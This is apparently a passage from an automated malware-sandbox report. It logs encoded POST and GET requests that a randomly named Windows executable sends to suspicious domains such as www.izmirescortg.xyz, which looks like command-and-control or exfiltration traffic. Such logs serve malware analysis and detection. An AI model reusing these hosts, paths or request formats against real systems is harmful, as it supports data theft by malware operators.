                                                                                                                                                Host: www.ssrpidemt-soar.sbs
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Length: 10301
                                                                                                                                                Origin: http://www.ssrpidemt-soar.sbs
                                                                                                                                                Referer: http://www.ssrpidemt-soar.sbs/nja3/
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                                                                                                                                                Data Raw: 69 66 7a 74 3d 38 56 54 77 45 58 2f 49 53 48 79 68 61 4c 70 55 36 49 41 51 68 45 47 4e 7a 50 37 6b 39 52 5a 39 4d 45 72 53 71 4a 41 74 59 53 38 72 62 48 4c 79 4c 71 7a 39 55 31 62 31 7a 7a 55 57 75 71 6b 73 30 6c 4a 32 70 67 74 59 6f 64 6a 2b 73 6d 4c 45 75 53 35 47 75 6b 35 50 51 68 4d 63 48 57 2f 69 67 4a 46 32 61 42 66 42 34 68 66 6a 51 45 6d 50 31 44 6d 58 6c 62 76 31 75 71 73 75 49 47 66 55 75 31 61 39 44 53 43 59 6c 4b 59 71 6c 44 41 2f 39 49 68 62 55 33 51 56 74 78 72 67 6d 49 59 2b 49 45 57 6d 6c 78 35 2f 33 45 4b 50 36 48 69 69 57 57 46 4f 2b 70 44 59 5a 6d 79 77 65 63 4c 43 59 30 4e 31 43 35 63 4e 67 33 68 58 45 33 62 2b 51 30 76 4d 78 55 54 63 30 74 34 4b 38 4a 33 50 4c 6e 4d 37 62 34 79 4c 49 31 59 55 64 31 43 50 2b 71 4b 4b 73 6a 66 58 44 58 4a 51 35 6b 5a 7a 68 53 31 45 48 47 38 79 53 2b 45 62 2b 42 72 4d 47 49 38 70 4e 6b 59 6e 54 7a 4d 78 64 53 32 4d 69 35 66 55 48 7a 33 79 35 53 6e 38 79 2f 6a 4c 57 4e 5a 35 67 4b 77 42 54 56 47 44 48 56 71 6f 4f 69 36 67 30 63 50 46 6d 54 51 52 61 [TRUNCATED]
                                                                                                                                                Data Ascii: ifzt=8VTwEX/ISHyhaLpU6IAQhEGNzP7k9RZ9MErSqJAtYS8rbHLyLqz9U1b1zzUWuqks0lJ2pgtYodj+smLEuS5Guk5PQhMcHW/igJF2aBfB4hfjQEmP1DmXlbv1uqsuIGfUu1a9DSCYlKYqlDA/9IhbU3QVtxrgmIY+IEWmlx5/3EKP6HiiWWFO+pDYZmywecLCY0N1C5cNg3hXE3b+Q0vMxUTc0t4K8J3PLnM7b4yLI1YUd1CP+qKKsjfXDXJQ5kZzhS1EHG8yS+Eb+BrMGI8pNkYnTzMxdS2Mi5fUHz3y5Sn8y/jLWNZ5gKwBTVGDHVqoOi6g0cPFmTQRa7s6cQzj2aYMhNNOZp1OLuTdgkNZLCgO/S1vSioafE3j5+pksTCQmn3/TxTMlf1OjftLPCJmJ2igUGRdjQQ5FY++lPrpEaaAbZdpafwcB1ufchedbp87lMNFw8CM7fcwbc3z5gG/0npCxmBjbMapWD8zjr76oEVZV1ugYJ+ZqZfaddn2SjNHt0vwdEDFlicFCPfQuE2OMTmFbSleG0u46ptwOL+aHzSSj5LDURFSdNSFy4EKDoLVl2HGVb+ikrmdoSd/Eaw18fbPoVZqUJcSyKggkirwBYP2Rd/1WhYCMTBHGp10zo7PAe32cnpiE6TkWz4SRN/BwHDZLiifoJd47eii7oVCaYzlfz6qz8AqiT0UeyyMnxSBmiPc5QrxJPjGuurISquJ2Y3R9wqUn8PO7N55vzO7S8gNNWUnqnUL/OsSEzqJ0oOWfhyvizHbAFTj69cy7G5s3zpAxbAxuD5856h2qjVbdFmBXFrosfZjsp4T93fif5o3WFhb4eQsERIZlTNkzAHR0/dYB9QUkUCO4eP1BuJHEWyusqYIYx2c+3xniD23Ly8FhNUVlPAZUOb2jobQBBz2NSkoz7VdtYXt1mg5ugnTiidzX8hEZCqf9BUFtx8341Oc5mD5iTCn7Hu+pAqSN/6RL5v0bv/teiLcPxICfKdgObKsIXz [TRUNCATED]
                                                                                                                                                Nov 25, 2024 09:43:55.395097017 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                Date: Mon, 25 Nov 2024 08:43:55 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Last-Modified: Thu, 29 Aug 2024 18:03:22 GMT
                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=140qK32yVEVwPJUhwoLOY23A3fzoHPiIF9DPqyWJedvfp9m8QPrs%2FKnVLKlX%2BYOGDw4Roh2XWPJVzozek8wk5MegsrOCnh%2FwIfNkc7PmXeZ4AfzKVM6mQFQWXLx2bPia7Q3z2s3lmoUx"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8e805a94e8a7c33d-EWR
                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1693&sent=5&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10900&delivery_rate=0&cwnd=136&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                Data Raw: 32 63 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 54 df 6f d3 30 10 7e df 5f 71 64 02 81 b4 d4 4d bb 31 9a a4 91 46 bb 89 49 03 26 56 04 7b f4 92 6b 6c 48 ec 60 5f d3 86 89 ff 1d 39 c9 da 4e fc 7a c1 79 b1 ef be fb be 3b fb 2e f1 93 f9 fb d9 e2 f6 fa 1c 04 95 05 5c 7f 7c 7d 75 39 03 cf 67 ec d3 78 c6 d8 7c 31 87 cf 6f 16 6f af 20 18 0c e1 86 8c 4c 89 b1 f3 77 1e 78 82 a8 0a 19 5b af d7 83 f5 78 a0 4d ce 16 1f d8 c6 b1 04 2e ac df fa b6 8d 19 64 94 79 c9 41 dc 8a 6c ca 42 d9 e9 6f 08 82 c9 64 d2 c5 79 0e 14 16 5c e5 53 0f 95 07 db 5d 12 0b e4 59 72 00 00 10 93 a4 02 93 e3 e1 31 3c 2b 33 6e 45 04 ef 34 c1 85 5e a9 2c 66 9d b3 03 96 48 1c 9c 9e 8f df 56 b2 9e 7a 33 ad 08 15 f9 8b a6 42 0f d2 ee 34 f5 08 37 c4 9c 7e 04 a9 e0 c6 22 4d 3f 2e 2e fc 57 1e db 27 52 bc c4 a9 97 a1 4d 8d ac 48 6a b5 c7 70 a3 8d 69 8e a0 e2 39 82 d2 04 4b 97 cc 36 dc 52 53 20 50 53 61 af 95 5a eb 75 3e b7 ee 74 d6 c0 fd 52 2b f2 ad fc 8e 61 70 5c 6d 22 48 75 a1 4d 78 78 da ae 08 5a f7 92 97 b2 68 42 6e 24 2f 22 70 54 3e 2f 64 ae [TRUNCATED]
                                                                                                                                                Data Ascii: 2c8To0~_qdM1FI&V{klH`_9Nzy;.\|}u9gx|1oo Lwx[xM.dyAlBody\S]Yr1<+3nE4^,fHVz3B47~"M?..W'RMHjpi9K6RS PSaZu>tR+ap\m"HuMxxZhBn$/"pT>/d~l9Epr29;=&*aFpp~rv2I
                                                                                                                                                Nov 25, 2024 09:43:55.395175934 CET349INData Raw: 44 60 d4 8a b4 86 35 ca 5c 50 08 77 ba c8 22 28 90 08 8d 6f 2b 9e 4a 95 87 e0 07 0e f8 20 ef 8f 5b f9 f1 a4 da ec e9 57 70 bf 96 19 89 70 dc d1 fe 5a 6c 4f e0 17 b8 a4 90 af 48 47 bd c1 b4 da ad e5 01 43 ba 0a 61 ec ea dc 29 64 b2 fe 2f 1a 3b 46
                                                                                                                                                Data Ascii: D`5\Pw"(o+J [WppZlOHGCa)d/;FR}dVfd]"fm%1 vbv+Y~ %cx0J]L$v i4Lm7ph%o$,Ak[[


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                20192.168.2.449887172.67.223.206803164C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Nov 25, 2024 09:43:56.739197969 CET522OUTGET /nja3/?ifzt=xX7QHijLKmKAWZAs9KUJ90Gt08KwtA5eAlD9v6t/QyACTljzLqSragPJ2hUI6qEgwVB84l05/Y7pq3HewBlXgm1FdHpiB2a4qq1LC2jezQbSehWYjzmvyps=&qX=qP0hoZO0bjg4 HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.ssrpidemt-soar.sbs
                                                                                                                                                Connection: close
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                                                                                                                                                Nov 25, 2024 09:43:58.057775021 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                Date: Mon, 25 Nov 2024 08:43:57 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Last-Modified: Thu, 29 Aug 2024 18:03:22 GMT
                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=syP%2F37s08wI9AxVRDoekntVfX73U30%2B44oBKnIB%2BQQF0Z1t%2BvLvzERA9Nskmksgz00azIRYOjYUancTjwINhbTKHr9EP3yRXkAzQ0Nlr6ahNkDIZCJ3YY93RgnHFtmejCWhmBXOzEjhr"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8e805aa5aec40f45-EWR
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1665&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=522&delivery_rate=0&cwnd=155&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                Data Raw: 35 38 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 26 6d 64 61 73 68 3b 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e [TRUNCATED]
                                                                                                                                                Data Ascii: 583<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>404 &mdash; Not Found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta name="description" content="Sorry, page not found"/> <style type="text/css"> body {font-siz
                                                                                                                                                Nov 25, 2024 09:43:58.057900906 CET1007INData Raw: 65 3a 31 34 70 78 3b 20 63 6f 6c 6f 72 3a 23 37 37 37 37 37 37 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 7d 0a 20 20 20 20 20 20 20 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a
                                                                                                                                                Data Ascii: e:14px; color:#777777; font-family:arial; text-align:center;} h1 {font-size:180px; color:#99A7AF; margin: 70px 0 0 0;} h2 {color: #DE6C5D; font-family: arial; font-size: 20px; font-weight: bold; letter-spacing: -1px; margin: -3


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                21192.168.2.449903172.67.186.192803164C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Nov 25, 2024 09:44:03.798336983 CET792OUTPOST /sba9/ HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.izmirescortg.xyz
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Length: 201
                                                                                                                                                Origin: http://www.izmirescortg.xyz
                                                                                                                                                Referer: http://www.izmirescortg.xyz/sba9/
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                                                                                                                                                Data Raw: 69 66 7a 74 3d 73 75 69 36 59 4a 34 50 2b 56 65 6d 68 35 57 2f 54 41 2f 48 38 2f 50 34 52 75 6e 51 43 54 6a 61 78 6b 49 70 79 51 35 62 45 6c 56 39 6d 51 50 70 52 70 65 6c 42 58 44 79 71 49 79 5a 42 79 57 58 4e 4d 65 31 61 37 6c 51 75 2f 6a 44 42 6d 78 46 63 4f 7a 55 78 49 31 33 47 55 31 78 49 71 38 4c 6e 63 72 44 78 67 51 67 62 65 77 38 4f 5a 46 75 65 6f 35 2b 54 4f 59 35 55 33 4b 30 54 58 47 49 47 35 58 6d 6c 55 64 69 42 58 56 77 4f 68 48 70 76 39 47 4a 43 44 43 72 69 4b 6a 6b 43 6b 47 52 46 52 57 4a 78 32 5a 75 43 69 64 39 73 2b 34 78 70 56 38 55 6b 33 68 6c 30 78 41 71 2f 34 54 34 79 77 3d 3d
                                                                                                                                                Data Ascii: ifzt=sui6YJ4P+Vemh5W/TA/H8/P4RunQCTjaxkIpyQ5bElV9mQPpRpelBXDyqIyZByWXNMe1a7lQu/jDBmxFcOzUxI13GU1xIq8LncrDxgQgbew8OZFueo5+TOY5U3K0TXGIG5XmlUdiBXVwOhHpv9GJCDCriKjkCkGRFRWJx2ZuCid9s+4xpV8Uk3hl0xAq/4T4yw==


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                22192.168.2.449909172.67.186.192803164C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Nov 25, 2024 09:44:06.495822906 CET812OUTPOST /sba9/ HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.izmirescortg.xyz
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Length: 221
                                                                                                                                                Origin: http://www.izmirescortg.xyz
                                                                                                                                                Referer: http://www.izmirescortg.xyz/sba9/
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                                                                                                                                                Data Raw: 69 66 7a 74 3d 73 75 69 36 59 4a 34 50 2b 56 65 6d 75 39 71 2f 49 6a 58 48 36 66 50 2f 49 4f 6e 51 4c 7a 6a 65 78 6b 45 70 79 52 74 78 46 54 46 39 6c 77 2f 70 44 34 65 6c 43 58 44 79 69 6f 79 63 4d 53 57 59 4e 4d 69 39 61 35 68 51 75 2f 33 44 42 6e 42 46 66 2f 7a 56 2b 34 31 31 41 55 31 4a 58 36 38 4c 6e 63 72 44 78 67 45 47 62 66 55 38 50 70 31 75 65 4d 74 39 4d 2b 59 36 56 33 4b 30 58 58 48 42 47 35 58 45 6c 57 6c 59 42 55 39 77 4f 6b 6a 70 75 70 79 47 59 54 43 74 39 61 69 68 43 52 71 59 42 44 48 69 78 48 39 74 43 32 74 69 70 34 31 72 34 6b 64 44 32 33 46 57 70 32 4a 65 79 37 75 78 70 37 46 6d 68 75 42 41 58 55 48 4d 6a 74 69 47 58 53 6f 70 64 2b 45 3d
                                                                                                                                                Data Ascii: ifzt=sui6YJ4P+Vemu9q/IjXH6fP/IOnQLzjexkEpyRtxFTF9lw/pD4elCXDyioycMSWYNMi9a5hQu/3DBnBFf/zV+411AU1JX68LncrDxgEGbfU8Pp1ueMt9M+Y6V3K0XXHBG5XElWlYBU9wOkjpupyGYTCt9aihCRqYBDHixH9tC2tip41r4kdD23FWp2Jey7uxp7FmhuBAXUHMjtiGXSopd+E=
                                                                                                                                                Nov 25, 2024 09:44:07.719129086 CET1055INHTTP/1.1 404 Not Found
                                                                                                                                                Date: Mon, 25 Nov 2024 08:44:07 GMT
                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DXZ5J92v8v4474zAStMVZH2IJAccT%2FyO1Zf05NZguCl4aoCPvv6%2Bpz2rhi3wM6pT0ldwT4TsqWYNLH097ooXBGFt6XZ0DiKzAhWRIWawfSonAhZKl3xDxPxi0d4%2F%2FpDKY1orWoVzJQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8e805ae21e7c4241-EWR
                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2110&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=812&delivery_rate=0&cwnd=214&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                Data Raw: 66 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 54 90 c1 6e c2 30 10 44 ef f9 8a 29 e7 96 85 8a a3 65 a9 25 41 20 a5 14 55 e1 d0 a3 c1 5b 6c 29 d8 d4 d9 14 e5 ef ab 98 4a 6d af b3 6f 76 67 56 dd 95 af cb e6 7d 57 61 dd bc d4 d8 ed 9f eb cd 12 93 07 a2 4d d5 ac 88 ca a6 bc 4d 1e a7 33 a2 6a 3b d1 85 72 72 6e b5 72 6c ac 2e 94 78 69 59 2f 66 0b 6c a3 60 15 fb 60 15 dd c4 42 51 86 d4 21 da 61 f4 cd f5 1f c6 cd 75 a1 2e ba 71 8c c4 9f 3d 77 c2 16 fb b7 1a 57 d3 21 44 c1 c7 c8 21 06 88 f3 1d 3a 4e 5f 9c a6 8a 2e d9 f6 64 ad 17 1f 83 69 db e1 1e 06 ff 02 14 9c 52 4c 79 11 87 63 ec 83 70 62 8b ab f3 2d 43 d2 e0 c3 09 12 d1 77 0c 13 50 8d 70 19 8f fd 99 83 8c ba 33 c1 8e e0 6f b2 9f b3 94 8b 28 ca 0f f8 06 00 00 ff ff e3 02 00 59 3c e4 fe 3b 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: f5Tn0D)e%A U[l)JmovgV}WaMM3j;rrnrl.xiY/fl``BQ!au.q=wW!D!:N_.diRLycpb-CwPp3o(Y<;0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                23192.168.2.449915172.67.186.192803164C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Nov 25, 2024 09:44:09.168637991 CET10894OUTPOST /sba9/ HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.izmirescortg.xyz
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Length: 10301
                                                                                                                                                Origin: http://www.izmirescortg.xyz
                                                                                                                                                Referer: http://www.izmirescortg.xyz/sba9/
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                                                                                                                                                Data Raw: 69 66 7a 74 3d 73 75 69 36 59 4a 34 50 2b 56 65 6d 75 39 71 2f 49 6a 58 48 36 66 50 2f 49 4f 6e 51 4c 7a 6a 65 78 6b 45 70 79 52 74 78 46 54 4e 39 6c 44 33 70 52 4c 6d 6c 44 58 44 79 2b 34 79 64 4d 53 57 42 4e 4d 36 35 61 35 74 41 75 38 50 44 54 51 70 46 61 4e 62 56 70 6f 31 31 43 55 31 79 49 71 39 4a 6e 66 54 48 78 67 55 47 62 66 55 38 50 72 64 75 58 34 35 39 66 75 59 35 55 33 4b 34 54 58 47 6b 47 35 50 2b 6c 51 35 79 41 6b 64 77 50 45 7a 70 6a 38 47 47 41 44 43 56 38 61 69 48 43 52 76 41 42 44 4c 45 78 48 49 49 43 78 64 69 70 66 77 38 70 51 74 55 76 46 74 61 71 6b 4a 6f 36 72 75 38 6c 37 5a 4f 78 37 59 62 50 47 37 44 6b 4e 48 72 51 77 63 70 66 62 35 6e 52 4f 78 63 70 4b 44 6a 6b 78 50 47 41 55 58 6e 53 4f 54 72 42 61 30 35 36 33 31 57 58 4a 37 65 56 47 6a 2b 71 50 32 33 31 77 6a 58 73 41 4f 53 44 65 6b 65 4a 55 33 69 59 6a 64 58 38 64 64 62 72 74 65 58 56 33 51 73 79 55 43 50 49 30 67 5a 70 72 62 68 75 68 48 6d 51 4e 42 62 43 61 77 41 76 65 49 67 56 73 74 72 72 50 4d 68 51 2f 4f 58 55 73 30 6c 6c [TRUNCATED]
                                                                                                                                                Data Ascii: ifzt=sui6YJ4P+Vemu9q/IjXH6fP/IOnQLzjexkEpyRtxFTN9lD3pRLmlDXDy+4ydMSWBNM65a5tAu8PDTQpFaNbVpo11CU1yIq9JnfTHxgUGbfU8PrduX459fuY5U3K4TXGkG5P+lQ5yAkdwPEzpj8GGADCV8aiHCRvABDLExHIICxdipfw8pQtUvFtaqkJo6ru8l7ZOx7YbPG7DkNHrQwcpfb5nROxcpKDjkxPGAUXnSOTrBa05631WXJ7eVGj+qP231wjXsAOSDekeJU3iYjdX8ddbrteXV3QsyUCPI0gZprbhuhHmQNBbCawAveIgVstrrPMhQ/OXUs0llcgU6kWl20ZGr2BCYX4Oegn8qgSIb+UCPWs+DmbtmYFoy3i36rF2gEyFX8+8Mpqx3hEt/mInIUuVHPa+zIdNRG+bML2WToCxrW/aRK1zlJOBUAlx6P3qQXe0Xke45OrWp58B4fyW8X+rMsNcE+EMD8HvLQIMdnJt45+jUFBEiGoB6fXWyL4HVAZ/Jn62k8pqWaJtod/7PbiKgh50C3hY6T6EUf9Z+mH50dtFeb9zjJmY52gXSFX5auBIzUVelKvd10eoQ6Ac27gIIJe9+gCrhH8eH4+vEBuhmgjjU9v77KqFuOk2skyUtgrzhEnJpyUTSzawIgfeUijYJwWO8D78rsuXSqfH0ENbvzrkC+uhIcalPmK/JLn3NyAOl4ncF9ydN6+RvVUH4zqCgrKosZu+Z7O05VfgKvzFY8GBXOGfMyQ4XyFskqK1brBB4+bCp/dD2myU8S6DcpSg+eMn4IxQVI+jSMC9r4FzuWVLGI1k3cbSWLRDz+h+uwjjA+PO0lI6oyiZfWJPxVqP7+l3C7O0WMzFY1SLwVaas5tawoATCzBLkPWeQGQgIdqdxObcx1jNA32wTspbsjPwIn0SDVBKFDfkhtE9CugashSQMt3efBhmzOlRQwkEWhv3wO+hixXAipX12y8u5xmUIB0xWrvDKnntMMdc3X18HsZ [TRUNCATED]
                                                                                                                                                Nov 25, 2024 09:44:10.340202093 CET1060INHTTP/1.1 404 Not Found
                                                                                                                                                Date: Mon, 25 Nov 2024 08:44:10 GMT
                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=noHmE0Cv4jk80YcMc7uOgWc4bUwJBpwRoRMRIYOI%2BLnxemZh84X7hk3E%2BDmvX0CCPhvXnmSWcq8OEjiyJc%2FcA8rtet30ng%2Fb4qqQA9IGssozlWYDfN1IsYuffRth6eEVF%2FuZ5yGmpw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8e805af30d814205-EWR
                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1588&sent=4&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10894&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                Data Raw: 66 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 54 90 c1 6e c2 30 10 44 ef f9 8a 29 e7 96 85 8a a3 65 a9 25 41 20 a5 14 55 e1 d0 a3 c1 5b 6c 29 d8 d4 d9 14 e5 ef ab 98 4a 6d af b3 6f 76 67 56 dd 95 af cb e6 7d 57 61 dd bc d4 d8 ed 9f eb cd 12 93 07 a2 4d d5 ac 88 ca a6 bc 4d 1e a7 33 a2 6a 3b d1 85 72 72 6e b5 72 6c ac 2e 94 78 69 59 2f 66 0b 6c a3 60 15 fb 60 15 dd c4 42 51 86 d4 21 da 61 f4 cd f5 1f c6 cd 75 a1 2e ba 71 8c c4 9f 3d 77 c2 16 fb b7 1a 57 d3 21 44 c1 c7 c8 21 06 88 f3 1d 3a 4e 5f 9c a6 8a 2e d9 f6 64 ad 17 1f 83 69 db e1 1e 06 ff 02 14 9c 52 4c 79 11 87 63 ec 83 70 62 8b ab f3 2d 43 d2 e0 c3 09 12 d1 77 0c 13 50 8d 70 19 8f fd 99 83 8c ba 33 c1 8e e0 6f b2 9f b3 94 8b 28 ca 0f f8 06 00 00 ff ff e3 02 00 59 3c e4 fe 3b 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: f5Tn0D)e%A U[l)JmovgV}WaMM3j;rrnrl.xiY/fl``BQ!au.q=wW!D!:N_.diRLycpb-CwPp3o(Y<;0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                24192.168.2.449923172.67.186.192803164C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
                                                                                                                                                TimestampBytes transferredDirectionData
